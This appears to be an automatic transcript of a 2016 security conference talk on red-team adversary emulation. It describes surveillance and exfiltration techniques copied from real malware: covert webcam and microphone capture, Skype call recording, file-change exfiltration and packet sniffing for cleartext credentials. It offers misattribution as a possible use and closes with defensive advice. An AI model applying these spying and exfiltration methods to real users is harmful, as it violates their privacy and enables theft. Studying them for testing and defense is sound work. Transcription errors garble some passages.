Adversarial Post-Exploitation: Lessons From The Pros

the b-sides DC 2016 videos are brought to you by clear jobs net and cyber sex calm tools for your next career move and Antietam technologies focusing on advanced cyber detection analysis and mitigation good morning thank you besides for having us putting this on our talk is going to be called adversarial post exploitation lessons from the pros we're going to go over a lot of really interesting stuff here today we're going to focus on a kind of introduction on what adversary emulation is and what red teaming is and how we apply it in the services space lessons from bad guys we're going to go through a bunch of different apt examples and malicious pieces of malware that we

found and talk about how we can study them to better emulate bad guys on engagements we're going to go through each feature at a technical level go through the mal reverse engineering of it what we discovered and how we apply that as well as kind of a very broad overview of the defense I'm just a Warner I'm the manager of offensive services here at the adapter threat division so I hear a whole bunch of us up here I'm a former Air Force guy spend a lot of time in the DoD about five years a lot of time right and then I transition to the commercial sector where I do consulting now I'm a Fairfax County volunteer EMT so if there's any

fire rescue volunteers hi Chris my name is chris ross i've been a part of a TV for just about two years I'm also involved with Python Empire and I'm a former sysadmin so inspiration for this talk I saw the talk by ritual war tell a long time it goes a couple years ago at B side chicago and his talk was called malware's hard let's go shopping and the generic theme of the talk was diving deep into a supposedly very advanced bad guys malware sample to look at the different mistakes they make and then how we can learn from them so I really like the idea of a mix of a technical talk where you're diving deep into these

samples as well as kind of applying the big broad overview as well as many of the different offensive tool sets that have come out over the past couple years so Mac grabbers power supply project PDF proxy Meekins all these different tools that are based on techniques that are being leveraged by real-world bad guys and breach scenarios and it inspired me to kind of look at what we could do better from the from the other side and then lots of red team engagement so in the two years I've been on numerous red team engagements for commercial top fortune companies and you learn a lot in each engagement you kind of take away a different lesson learning a different

skill or technique that that was never heard about before never really been publicized or a way to do it that's not previously known and in these engagements you really learn a lot so before we go too deep we want to give you a good intro overview about really what we're talking about so first we have to start with what is an adversary and that's kind of the other guy on the other side of the playing field this is this is if you're a blue team this is the red team or for the red team the blue team or in the real world this is either nation-states or criminals or you know kids in a basement or you know

any sort of asymmetric threat that might be out there then what is the threat it's that thing that it's the source of the harm so both source and means and there's a wide range of different adversaries so when you talk about red teaming or adversary emulation you're not really just focusing on super advanced like nation state level threat that could be one aspect of it so there's there's obviously apts like these guys notice the middle pictures matt graver he's apt there's also a BTS like these guys so these are these are rare old threats to environments they might be it might be a deed awesome it might be a script kidding in a basement but because of the

means of warfare or the means of computers these days it gives them a unique advantage that makes them a real power in an environment and so when you talk about adversary emulation it's it's a form or subcategory of red teaming is how I like to think of it it's a specific kind of red teaming focused on modeling a very realistic known threat and so you're looking at you're utilizing intelligence that is either public or private to model this adversary you're trying to both model their behaviors and objectives all the way down to their low level techniques or malware or ways that they do things they're obviously a lot of benefits to this approach so you know it's very

measurable you can actually tie your direct actions as something that's been done in the wild which answers a lot of questions from execs and different decision makers but also there's some notable weakness is that are that are introduced and so when you're forced to model a specific adversary you risk of handcuffed in the red team so part of red teaming is being creative and flexible and learning in the engagement to adapt and change when you're trying to model an adversary if you if you do that if you flex and adapt you might deviate from that model or that threat model in which case you you risk kind of straying outside of what you were intending on doing and so some of these

weaknesses are worth noting it doesn't this depends on what the end goal or what the objective isn't in the different engagements as there's no real framework for adversary emulation or ways to model adversaries I kind of like to look at defensive frameworks or tools so there's something called the diamond model which is essentially it's a mathematical model it's it's used both mathematically as well as kind of in a generic concept but it basically states that for every intrusion event there's an adversary taking a step towards an intended goal by using a capability with an infrastructure against the victim so it breaks out and characterizes adversaries into kind of four different components and so we're going to talk a

lot about tools today in capabilities and techniques but there's other aspects of our steering emulation that you have to be aware of when you're when you're actually doing this threat modeling things like are you using a similar type of infrastructure or the same infrastructure as them not necessarily IP addresses but let's say they use digital ocean during their operations can use digital ocean or adversaries what adversary are you trying to become and what victims are you going after with what objectives post exploitation I want to make sure I highlight and call this out this is one of the biggest phases during red team and adversary emulation engagements and so oftentimes in our engagements they can be weeks to months to half a year

long and in that case we want to make sure that we are often in the network within the first week meaning that we're spending four to five months moving around the environment targeting different objectives in in working through different phases and so post exploitation is probably the most consequential phase during these engagements it's where the most of the intelligence gathering is conducted it's where you're actually obtaining and getting your objectives as well as demonstrating that impact and in providing the training two different blue team members which is the ultimate goal of these engagements it's not just show they're vulnerable that's one aspect of it but it's also provide training as well as show the risk of a

breach in an environment before you go to much deeper we're the dog and the bad guys the turtle and so we're going to ride off all the work that they've done and we're going to heavily focus on stealing their ideas or learning from them so that we don't have to go innovate as often innovation can be really awesome it can be expensive and resources and time and money and researchers so if you can study a sample or a specific breach analysis why not just replicate some of the activity you've seen there again relax somebody's already done the work for you that's the beauty of being a red team er so when focusing on threat emulation

with focusing on threat emulation it really pushes you to understand the what's going on underneath these different samples and techniques and I think as testers we generally have an idea that we practice their emulation on and gave engagements when really where we're modeling ourselves after a general threat so this is just a general overview of our process for a threat emulation and I'll talk about each of these in the following slides so where can we see some of these cool stuff I know myself personally I like to look at threat reports to find new cool ideas to implement I'm and also some of the times these reports are more so marketing material than actual technical

documentation which is unfortunate but really that's what we're looking for a detailed sort of map of where we need to go to implement this technique and then when it comes to analyzing or looking at these samples you want to lean on the technical documentation that you acquired previously and use that to kind of walk you through the code or walk you through what you can look at an Ida pro on to find specifically what you're looking for and how to implement it and I definitely recommend practical malware analysis to anyone who's interested in reverse engineering it's a great book there's a lot of hands-on labs and you'll definitely take away something from it and we won't do

this to you we're not going to show you just a random screenshot of some I to pro output expect you to gain much from it I think it's really cheesy when companies do that so when looking at alternatives the great thing is that there's almost always a POC or some open source project that is available on github or Rohit labs or somewhere else for you to use as a base for your project for development I think that's a great thing and it allows you to quickly or rapidly develop your PLC for the technique you want to implement so when it comes to implementation I think the level of difficulty depends on how well you want to replicate what this

threat was doing or what this what this group was doing in their technique whether you want to definitely focus on true threat replication or you want to take what they did and sort of modify it and apply to a general or generic solution and definitely you want to live off the land and that's what brings us to why we love powershell so much I think nowadays whenever you see a new tool release nine times out of ten you can say it was implemented in PowerShell and for me the biggest benefits are just direct access to the windows api and its default installed on windows 7 and above and just a little disclaimer all these tools that we've written our strictly

POC and we don't really plan on providing active support for some of them after this talk so we're going to ignore your get issues and make sure you understand the code in use it at your own risk and even contribute if you can so I'm going to go back it's a huge pet peeve the screen shot at the bottom is sewing running code right off of github don't do that no your code or else we'll put message boxes in them so you get popups on every OPP you use we've totally not done that so the first example we're going to cover was inspired by an adversary or a tool that we saw going around the y a

lot of the old-school Trojans you see Senate running around things from late 90s or early thousands it's it's all the rage to like get webcam and microphone access right like that's the sexiest thing you can do is access someone's webcam and take a snapshot of them you get this really juicy picture of them playing Wow or something it's really impressive now you might you might think it's kind of silly because you're like well what value does that actually have to a sophisticated adversary but there's a lot of intelligence that can be gained or learned from a microphone recording of you depending on what time or where you're at as well as the webcam image so

we start by kind of looking at these examples the the example we're going to dive into for the microphone recording is called Lux net rat it's an old school trojan similar to like you know sub 7 or back or first i was running around very commodity in its nature but it provided the ability to issue commands to a multimedia interface which allowed you to kind of dump WAV files and gain control of the microphone which will dive into a little bit deeper and then for the webcam specific capability we're going to dive into adversary known as rocket kitten they have a tool called mpk shell which is kind of their lightweight backdoor very very simple in

nature however it uses a set of API calls called VFW video for windows to access and control the webcam that we're going to dive deep into so for mci the basically what the malware sample did so when you tore apart Lux now and when you looked at it essentially the the bad guys controlling it were simply sending commands to something called the multimedia or multimedia command interface it's facing an abstraction layer over all the different devices that your computer uses most people don't even know it's there it's built into Windows it's built to help developers or programmers control those different devices and so by simply sending command strings to that abstraction layer it'll handle the back

end control the devices for you you don't need to do anything device specific or independent so when we were looking on an engagement one time we were like hey we need to we think it would be really cool to both demo this to the customer as well as see what we can gain by utilizing microphone capture God approvals went through everything we def duck this capability that used this technique and so it would send individual strings to that abstraction layer to essentially drop a recording wave file to disk and then allow you to download it and close the recording very simple requires like four different API calls to do and in very little chance of

error here as the abstraction layer is going to handle any faults or errors for you as far as the video capability with rocket kit and what they were doing is they were essentially using the VFW libraries inside of Windows to control a capture window and so they would instantiate a capture window on the system and then they would send commands to that capture window to get the drivers get the description and issue a recording and that hidden capture window and then they would disconnect the driver and that would result in a recording being written out the disk and now we're going to talk about how much that hurt us going forward so when researching alternatives for the video

stuff it was a really easy to find we went to microsoft's website we're like what else is there there has to be more native capability to access these different devices and one of the first things we see is many of its features have been superseded by DirectX it's like oh dang it rocky kitten like they're using old school like superseded capabilities and we'll show you why but essentially the biggest alternative was just use DirectX it's it's built for this very reason and there's a whole bunch of libraries and supports in different languages and so we consider that for audio we analyzed a lot of different tools so when I was going through all this piece of commodity

malware it's like the least fun thing for verse engineers the sit and stare at commodity malware all day and I was I spent about two days going through different samples hoping to find some different method of doing microphone capture fortunately the majority of them uses the windows multimedia library or in mci and so I didn't really find other ways although DirectX and we've considered other methods that would be just as usable so the resulting capability and the big picture takeaway for us was on that up where we actually ran into this situation we were able to mock up this capability we call to get microphone audio and powershell it's actually support supported to the power

supply dev ranch so this is one that will be supported unlike most of the others and it used the win it win MCI to issue this calls and dumped away file to disk the big picture takeaway is is we were able to take this luxe net route which we studied in depth reverse engineered it figured out how they did it and then directly mock it up for use during a red team engagement so when the customer says you know you guys were dumping audio from dis how are you doing that or why were you doing that you could you could cite and tell them you know let them know that you were your emulating a real bad guy that does this

in the wild in this case you might wonder what is audio gets you well when you're sitting in a call center or you're targeting a call center or a network operations center or a security operation center and they're handling trouble tickets or various different of customer support or I don't know administering systems audio gets you a lot you can hear a lot of really juicy details and you can learn a lot about the network by listening to voices rather than relying on pure IP addresses and scans and nessus and all the different types of telemetry that penetration testers and red teamers are used to the really big downside of this capability is that there is no

compression wah-wah so when you're using lean MCI and you're dumping these wave files they are giant and so if you're if you're working under strict like operational security concerns it's not encrypted it's a WAV file on disk and they're rather large and so you're going to chunk it up and x fill it out potentially in a little bit stealthier way than if you were to get good compression or mp4 some other method for the rocket kitten mock-up we had a lot of fun with this one I spent a lot of time playing with her mpk shell on a dev system and I built a logically similar mock-up and so I actually got it to the point where it was exact API is

called in the exact order that the adversary toolkit was with the exact flags and arguments and everything you know almost a line for line replication in the PowerShell of what their toolkit did but every time I ran it I would get a pop-up as the user which you're not not the goal of a red team or by the way is to get a user pop-up and so and it would always ask me to select the device and I'm like man maybe this is why Microsoft's who preceded this it turns out that VFW when you're using like a virtual a vm with a generic driver that handles all of that different multimedia including your camera the VFW doesn't

know what device to use and even when trying to specify it it doesn't take it real well so either I'm a really bad programmer or I just kind of figure it out and the rocket kenton actors didn't figure it out either because it's after playing with their toolkit enough I realized it did the exact same thing cause a giant user pop-up and so I put this out on github for release the github is going to be dropped right after the talk so you can see these different samples but I don't recommend using this in a real world engagement instead use this one so we went with Microsoft's advice after failing at the VA VFW stuff we went ahead and we found

dotnet assemblies that already implemented directshow and DirectX capability so all credit goes are those actors cited here are different different licenses but we embedded those into our tool which allowed us to gain that DirectX support straight up in our tool and so we can use both compression and video tuning with proper frame rates and we can open up the webcam and audio for capture in a very stealthy manner now the light does turn on so that's a good indicator compromise if your video light is turning on randomly but you'd be surprised how many places we've used it with no help desk ticket being submitted so now the big takeaway for adversary emulation in this case is the actors

what are they using webcams for well they're using it to capture I don't know maybe who is at the other end of that keyboard what are they doing where do they live is this as it's a residential purchase this is a commercial building for us personally it works really well in socks again you hear me talking about socks a lot these capabilities roku well it's nice that if you're on a laptop that just happens to be facing the wall of sin like that's always displayed in every operation center up on the wall and you can get a nice picture screenshot of all the sims in the background gives you a pretty good preview of all their technology as well

as any alerts that are at the top of the list there Giro tickets and and everything else that's pretty juicy in this tools this holes been put out on the on his github for random PowerShell scripts and we're going to show a quick demo of it so this tool or this tim was going to run for you let's see ooh escape the mood

two clues there it is

alright so the first function we're going to run here the first part of this is just kind of showing the ability to query the end user system so you can see here we're able to query and get the different audio inputs that are available on the system we're able to get the different compression methods that are available in the system and so this would allow you to be very granular and fine-tune exactly what compression and tools your your video and audio is going to record with so in this case you can see we have a USB video device and a microphone attached as well as different compression methods that are available to the actor and so obviously this is a

proof of concept we're not showing you in weaponized manner we're in a power shell prompt again not probably ideal if you're red teaming straight up like our DP din or anything but this is all usable and friendly to name your ex you know hacker tool that you like to use cobalt StoryCorps metasploit so in this case we're going to record a webcam video it's going to be a record time of four so four seconds with a video compression and we're going to add a compression to it as well to kind of keep the size as minimal as possible and then we're going to slap on reverse because I like to see output for EM everything and when it runs it's going

to set all the frame rates that the capture and start it so at this point the light would be on it's capturing video from the end user and that returns the file object that it's written to out on disk and so at this point you could you could as the adversary begin to chunk up and exfil this or if it's small enough which in this case it's it's a fair size we could just exfil it directly so just to show you improve we're going to see Chris Ross's pretty face here in a second

yay and so you can see that we were able to record the webcam in a very similar technique obviously adapted because in this case we decided that the alternatives were better than the pure threat emulation approach that we could have taken in the previous and the previous examples

okay with skype so earlier this year I think in February Palo Alto released a report giving a detailed account of the t nine thousand malware sample and they basically described one of the capabilities for that they that they had to record skype conversations and also take screenshots during the skype call that really piqued my interest I thought that'd be something really cool to implement in PowerShell and work on as a project so how did it go about recording conversations first it would start with sending a used the windows messaging API to send a broadcast message called API discover to all the windows president on the system and Scott were to respond to that and indicate that it was running

you know it's here and then the malware would send another message saying API attached requesting access to the skype desktop API and this is when the user will receive the warrant the little orange box you see up there a prompt saying that there's a process trying to gain access to skype and unfortunately there's no way around this but users are not the brightest people so they're probably going to click allow access anyway but once you are allowed access you'll start to see a flurry of messages from skype and any conceivable screenshot skype is pretty roburt verbose with its output so mainly while skype is running the the malware sample was looking for a call status ringing

message and once it received that it would send a message to retrieve the user handle of the other call participant and then it would move on and wait for a call status in progress message and it would instruct skype to redirect the microphone and audio output to a file on disk and then it would just run in a loop until the call status indicated that was finished I'm and then it would just record the call log so that brought about the skype recorder tool that we developed this was definitely something interesting for me to work on is a little challenging because this is my first time developing using.net reflection in PowerShell and the entire purpose of this is strictly

just intelligence collection like if we're able to hook some of these skype calls and listening on a conference or meeting minutes maybe we learn some more information about our environment so I'll move on to a quick demo

so we see here we import the skype recorder module and then we're going to start recording with a duration of 1 minute and you'll see it creates a window has a window handle and during that time it will go ahead and send messages to connect to skype and we're going to go ahead and start a call with our buddy echo the Skype test service and then once we receive a call status ringing and then call status in progress the it's going to go ahead and try to redirect output to a file and you'll see there that on skype echoes back and tells you that the output has been set to the file that you specified and then

while the call is in progress it will give you the entire the message about the duration of the call and then once the call is finished it will wait until the timeout loop is reached to output the location of the files and there's also some logic built into the tool where if you set the timeout loop to say one minute in the call last 45 minutes it'll keep on recording until the call is finished

so this is really really useful i've seen this really useful and engagements and commercial entities that they use skype for their commercial entities that there there are numerous of them to actually use skype for conference calls as well as enter like interwork messaging so you know in that specific case we walked in we weren't weaponized we're ready for anything with skype there's not too many tools that do this in the red team space and so again drawing inspiration from the bad guys in order to kind of solve a challenge or overcome an obstacle as well as in this case being able to directly quote or cite the apt that were they were working so almost every red team engagement I've

been in and especially on the first one I was working with will shredder another the right team or a company and I walk in and there's a couple of things he tells me to do our very first red team he tells me to do it by hand which is like I hate doing things by hand like hackers are all about hacking and automation so the first thing he tells me to do by hand or map all the domain trust in this environment and there's like 150 domain trust all in the CSV and he's like exploit this like fine Emily well I'm not going to do that i'm going to write something automate that the next thing we have to do is just some

sit in mine file chairs endlessly every red team irnos that feeling of just looking through dozens if not hundreds of file sharers an environment trying to find that one file that's either going to give you your escalation path or it's going to be the crown jewels just sitting unprotected in a file share ready for you ready for the stealing ready for you to highlight for that customer so in this case I was like why do we have to sit and look at file shares and why do I have to do this every day to detect changes there has to be a better way to do this and so for this specific case I apt 30 or Nikon they're really

solid actor lots of reporting and documentation on them which makes them a really good case study for thread emulation they have a piece of our called the flash flood malware which is essentially their host profile or their ability to survey an in-system and packaged up a whole bunch of preliminary data for exfiltration from the environment and so essentially how it works is it uses timestamps to measure changes in an environment and anything that changes in certain monitored directories automatically get exfilled out to this extra lector E and encrypted AK off you skated using some custom routine that's really really bad and easy to fix the things that it specifically gathers is the windows address books certain lnk files anything

from removable media any friend thing from the desktop Tim temporary internet it's all the normal stuff that pen testers and red teamers and adversaries are looking at every time they get on a box to try to look for interesting things and so when you dive down specifically to the monitoring and exfil component how it works they use an API called called find first file a which essentially gives you a pointer to a linked list of all the files in a certain directory and then they iterate over every file and every file they get to they compare a file time to see if that file time is newer than the last time that their tool ran which is stored

in some text file on the back end if it is it'll automatically archived it so it'll right up wrap it up in its custom in compression routine or custom off you skating routine and ex roll it out to this windows / files directory or recent files directory depending on what it is and then what and then it will it continue iterating over then the actor will return take everything in this office cated directory swipe it up take it out and remove it now the benefit here is is most pen testers and red teamers when they're on an engagement including us like you just maintain access to whatever systems you'd ask the soon use keep them calling home right

like if you get if you got on a new system you don't kill your agents every hour and you don't only do like 30 minutes of ops and clean off and leave it but when you're operating with operational security concerns so in some of our tightest read times we have to be very careful about where we leave agents and how long we're on the system and we have to be very selective and where we move throughout the network so in this case running a tool like this leaving it behind and then coming back to get your exfil later is a much better solution that allows you to maintain a more covert pressing presence in the

environment so when looking at different alternate techniques I like all the asynchronous options because like sitting there and just constantly iterating over and some time to manner seems kind of silly for me like there's this holy venting thing built into windows just is made for this but so there's the win32 API which exposes the fine first change notification API call that allows you to set up asynchronous events to watch for stuff like this or in.net since we're cheating or using powershell and.net there's the system diode a file watcher class or all system watcher class which will essentially monitor and fire some callback function every time there's a change in the file system in a specific location there's

also wmi events and then as far as acceleration or compression there's all sorts of options we specifically mentioned the script here i'll tak encrypted store it's a really really good option for saving off and encrypting or exfiltrating data it basically takes everything going into it encrypts it using AES or RSA and stores it kind of like a virtual file system so it's kind of like a VFS on a system so the in tool that we came up with really good for file shares we we utilize the previously written sit starts file system monitor tool with some slight tweaks in this case that we were using this tool on an engagement we were specifically asked to emulate a threat

so they wanted us to to try to model this specific our Terry so apt 30 and so in this case we we created a tool set and we created an encryption routine called right dash flash flood file which it takes in any file off the pipeline or any byte string off the pipeline and outputs it to the proper location with the proper iocs with the exact crypto routine the apt 30 is using so there's obviously numerous cases or use cases for this there's adversary emulation there's I don't know maybe misattribution or malware myth distribution maybe if you're trying to blame somebody else for your work if you encrypt all your stuff exactly like them and put it in the same places then

oftentimes analysts will jump to conclusions that's a pretty good a good use for this as well as just up you know obfuscating things on disk again this is their routine is like a very simple like add shift little kung flute confused so I don't I don't recommend actually using this on an engagement unless authorized by your customer it's much better to dump things that disk encrypted AES RSA so it's not going to be picked up especially if it's anything sensitive but again makes a good use case or demo in the case that you're trying to show the effects of a bad guy in the environment so let's see if we can find it here so we're going to load up our tool to

start file system monitor this has been tweet from the version that's on guests you be specific for our thread emulation scenario here and then we're going to start monitoring this really secretive recalled I hey I hide things on my desktop because by the way all the directories we see in real engagements are about that obvious now you notice there's nothing in here yet so the users just set this up and but they have a text file that they've written a note pad with all their super-secret data banking passwords and passwords of Pandora and everything else that they always store in the desktop so we're going to start our monitoring script and the user is going to be really lame and

drop their password text file and you'll notice that instantly they synchronous event fires which notice is that what's been created and it exel traits it obvious cated out to the exact directory that that apt 30 did so if you come to that directory you'll notice the files there we're going to open it up and show that it's not exactly plaintext it's a nice random byte string that doesn't make any sense then as the bad guy or the red team or whoever we are we would come back and pick up this file actual trade it which would be all their sensitive passwords and then we can read it because we're the ones who wrote the encryption

routine and so we can output all of their secretive data that we swiped off without them noticing so real time this would get everything that they add even if they delete it so if they instantly add it like a tent file or oh man I need to just write this password down real quick and they delete it because they're really secure against bad guys and they're aware of what they're doing this would swipe it it's a race condition so depends on if you can beat the milliseconds of asynchronous eventing but I'd like to bet on Microsoft on that one a couple times out of 10 alright

so for packet capture I think that's one of the most useful post exploitation capabilities that you can have when operating in an environment there are a lot of different attacks that use packet capture as a base to conduct the attack for one wsus man in the middle I think that's a really cool technique just being able to inject the payload into a wsus update and have it pushed to a remote host it's pretty amazing and also there are several apt groups that make use of packet capture for different techniques they implement for one Dooku love to drop the wimpy cap driver on and do a hot install and use a virtual file system to inject mdns replies so

how winpcap works usually it's a pretty dirty installation you'll have to drop all the required dll's and also the required driver and use SE to create a service and start that service for wimpy cap and then then you'll be able to utilize all the wimpy cab functions to capture traffic to your heart's desire so what other research is out there for one invoking vay it's a tool written by Kevin Ron Robinson it's a great tool for a spoofing attacks specifically w pad spoofing attacks uses raw sockets to capture traffic in respond to SMB or DNS or netbios requests and then also there's some work done by alex from deco or kill switch GUI he wrote a peer packet capture in c++

inside of a reflective DLL so it's pretty pretty great work another thing I've seen a lot of is when reversing all these different samples of examples of this one of the favorite techniques that I saw implemented by different actors and different reports was when the windows filtering platform drivers which is essentially a driver that's supposed to be a middle abstraction layer that you can install does require code signing but we've all seen that code signing certificates get stolen and so if these actors are able to get their hands on one they can sign their own a driver that that is built to basically intercept network of paths network packet capture the other one is etw a

little-known feature inside of Windows it's built for event tracing it's meant for debugging and administration but it exposes a huge amount of functionality to access back-end data on a system including Network traces so you can actually to some degree record and store off network traces all using a native built in tool in the environment so that's what brought about get wind pick pcap capture the PowerShell tool use utilizes some dotnet libraries to craft packets on and conduct packet capture it also takes care of the hot install of the wimpy cab drivers and also uninstall you can set the size limit for the amount of data you want to or packets you want to capture and also

a timeout so then I'll move to a quick demo

so you see here first we're checking to see if the npf service is installed and it's not so we'll go ahead and use the tool will import the wimpy cap capture and install the wind coupee cab drivers I mean currently it uses sexc to install this are to create and install the service we have plans in the future to change that to use peer dotnet reflection then once it's setup we can use the main function get wind pcap capture and we're going to capture / port 80 and set them excise 25 megs

and then we're going to capture over a plane a plaintext protocol someone logging into harmed reside which is pretty awesome totally not a vulnerability

I got approval for this and once it's finished it will output the location of the pcap file you can use the same script to uninstall the npf service and clean up and then we can just go ahead and open up that file with wireshark

and then we see the clear text login for the site

that's his face again yes so I've liked also note on this one that's I've seen the most use out of something like this in a lot of like finance and Industry you know there's a lot of regulatory protocols that control the use of plaintext protocols but you'll note that a lot of those protocols or a lot of the specific compliance things are about traffic over the boundary or things leaving the environment however there's this thing where bad guys get inside your environment and they don't need the boundary anymore and so if there's situations or systems or credit processing or financial processing or core banking or any of those other really good buzz words that utilize

praying text protocols this is a really good method to directly rip off of a bad guy to dump those financial transactions just clear text into a pcap and improve access to that data all without having to get on the mainframes which I hate touching anyway stay far away from so we feel kind of feel it's an obligation we try very hard to give mitigations or defensive talk on everything we do because you know our job as red teamers especially used to help better on train and improve the state of the industry and try to try to offer suggestions is the world ending no I would say it is very very hard to find a trick or a mitigation for a lot of

these different post exploitation activities in each of these cases there are indicators and things that could have been locked down to prevent this from occurring however I would say that it's it's it's kind of the focus oftentimes when we release these tools so we come up here and we do this talk and you should we show you everything in powershell right the number one thing we get after our talk like this is like I'm deleting PowerShell from my environment like don't let our proof of concepts this trick you this can all be done in native code to and this can all be done with built-in tools so we don't want you to think that you know power shells the

enemy I would say there's a core thing here are the issues this is in the words of a very very wise senior red team or Matt Nelson users are going to use and so like most often what adversaries are exploiting is that user they're using user behavior and they're using admin behavior in situations where they're supposed to be able to do it and the real focus should be on auditing and detection because that you know after an adversary gets admin in your environment and their due admin things oftentimes the things that's going to trip you off is admin things that don't normally happen in your environment let's say the admin normally takes a two hour lunch

and instead of his two-hour lunch it looks like he's working through lunch maybe you should ask the question why or I don't know if they're logging in at two in the morning from a VPN or any number of like every time you read a breach report you're like how did no one notice this this is very odd behavior but it you know it's easy in hindsight 20 20 but the auditing and real-time capture of all this kind of the industry best practices are going to help you one of the best blogs I like to recommend and I absolutely love this post I think it's extremely underrated is the Maslow's hierarchy of security controls written by Lee homes of our Microsoft

basically the concept is if you're installing like 15 next-gen agents to like solve all the security in your network but you don't have a V or white listing maybe you should take a step back maybe you should build a foundation of your network security and defense in the right order and step it up in an appropriate manner focus on the basics first the basics of detection have a sock have a team that's trained to respond and then you can start installing the tools that will empower that team to do their job we often get asked the new buzzword or the new favorite thing to say is threat hunting right like everyone's heard it we want

to hunt we want to hunt in our environment and that that's awesome I actually I'm a big fan of it I kind of go back to or boil this down to a very simple principle so Locard's exchange essentially it's a traditional forensics principle it's been applied to digital forensics as well it essentially says every contact leave it straight there's always trace evidence every time an actor enters your environment no matter how sexy and sophisticated they are now how many billions of dollars they spent on a tool there is an artifact left somewhere it's impossible not to leave an artifact somewhere however the trick is are you looking for the artifacts right so that's essentially what throw

hunting is is going to proactively look for and identify artifacts and so I'm a big fan of it I think if it's applied in the right way and it's focused on focus on the people aspect not just installing a bunch of tools that do things but trained analysts that use those tools and know how to organize an engagement I think you'll be very helpful the majority of times we've been call an engagement yes we get caught that's the job of the red team majorities at times we call or either users because we do something really bad and they notice or we intend to get caught or I are people that are being proactive they're digging through sim

data because they enjoy their job and while digging through sim data they notice something odd versus just sitting and waiting for the big giant red alert like nuclear alarm to go off in the sock which you know rarely happens in an adversary that knows the environment so what's the big takeaways from here well hopefully some really cool tools you can go play with and some ideas realistic threat revelation replication must model threats and so a lot of people say they do threat rap but are you really are you modeling a generic threat or remodeling a specific threat or have you even asked that question like because you know when you start talking about applying the appropriate

level of threat for the environment it doesn't always mean being super advanced apt sometimes it means modeling a rant similar threat to see how the environment would respond now all of the threat replication relies on realistic tactics and Intel and observe techniques which is the hard part in this industry because it's so hard to get your hands on a detailed post-mortem analysis of the majority of breaches one of my favorite talks was it was no easy breach i think is what it was titled it was talked about a derby colin and it was essentially a walkthrough of mandy and how they did this giant ir and it was like a major battle back and forth of

this adversary trying to fight for control in an environment and it's a really great post mortem for people to be able to learn how to replicate those threats there's plenty of creative things so all of you who have used screenshot and key loggers and that's it on your engagements think outside the box like there are so many different things you can do to collect Intel from a user that is powerful beyond those two simple techniques so expand your horizons get creative go out and study bad guys and how they're doing it and then go create that and then my favorite line and I always tell our new guys this is op SEC is never perfect I shouldn't even say

rarely so that trace evidence that that you're going to leave behind as a bad guy both understand what you're leaving behind and for the blue team errs understand what the bad guys leave behind so red needs to learn a little bit of blue and blue needs to learn a little bit of red 22 better everybody skill sets so we got a bunch of malware references we're going to put these slides up on SlideShare and release them but there's a bunch of my references for the specific hashes and reports that we talked about in here if you want to check out like how we modeled it or how close it was so these are kind of

reference material at this point open up for questions I think we have about five minutes and then we'll be out back we have a table out back and we'll be around for any other questions go ahead ah great question he's trying to stump me post actually by the way I work for this guy so he's just trying to troll me post exploitation and Linux so it's a great question we're heavy PowerShell people you'll see that we also we also a model a tool called Python Empire which has been since rolled into Empire we have an entire rat that we've built and released in linux and mac which is built to do just that so it's focused on post

exploitation model post exploitation modules written for those tool sets you'll notice that a lot of adversaries like they have tool kits and linux and mac but they're a lot harder to find because they're less of them i would say it's because nine of the top ten like commercial organizations use active directory and therefore they use a majority of windows we have operated in ninety percent mac environments and successfully conducted post exploitation so it's doable is just as doable with anywhere else you just got to know where to draw your inspiration and how to code the tools questions no all right either that was a really good presentation or you're all sleeping yeah [Applause] [Music]